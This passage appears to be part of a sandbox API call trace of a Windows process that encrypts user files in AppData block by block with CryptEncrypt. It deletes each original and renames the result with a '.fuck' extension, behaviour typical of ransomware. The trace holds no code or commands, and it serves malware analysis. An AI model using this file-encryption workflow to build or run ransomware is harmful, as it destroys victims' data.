lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.137] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.137] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.138] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.138] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.138] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.138] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.138] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.138] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.138] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.138] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.139] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.139] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.139] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.139] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.139] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.139] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.139] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.139] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.139] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.139] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.139] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.139] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.139] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.139] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.140] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.140] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.140] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.140] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.140] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.140] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.140] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.140] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.140] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.140] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.141] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.141] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.141] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.141] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.141] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.141] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.141] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.141] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.142] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.142] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.142] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.142] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.142] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.142] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.143] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.143] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.143] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.143] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.143] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.143] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.143] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.143] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.144] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.144] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.144] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.144] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.144] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.144] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.454] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00002.jrs.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00002.jrs.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00002.jrs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00002.jrs"), bFailIfExists=0) returned 1 [0245.834] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00002.jrs", dwFileAttributes=0x0) returned 1 [0245.835] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00002.jrs.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00002.jrs.gsg")) returned 1 [0245.837] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00002.jrs" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00002.jrs"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USSres00002.jrs.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\ussres00002.jrs.fuck")) returned 1 [0245.838] CryptDestroyHash (hHash=0x28e7df8) returned 1 [0245.838] CryptDestroyKey (hKey=0x28e8078) returned 1 [0245.838] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0245.838] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0245.838] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0245.838] GetLastError () returned 0x0 [0245.838] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\usstmp.log")) returned 0x20 [0245.838] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log", dwFileAttributes=0x80) returned 1 [0245.839] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\usstmp.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0245.839] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\usstmp.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0245.842] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log.gsg", 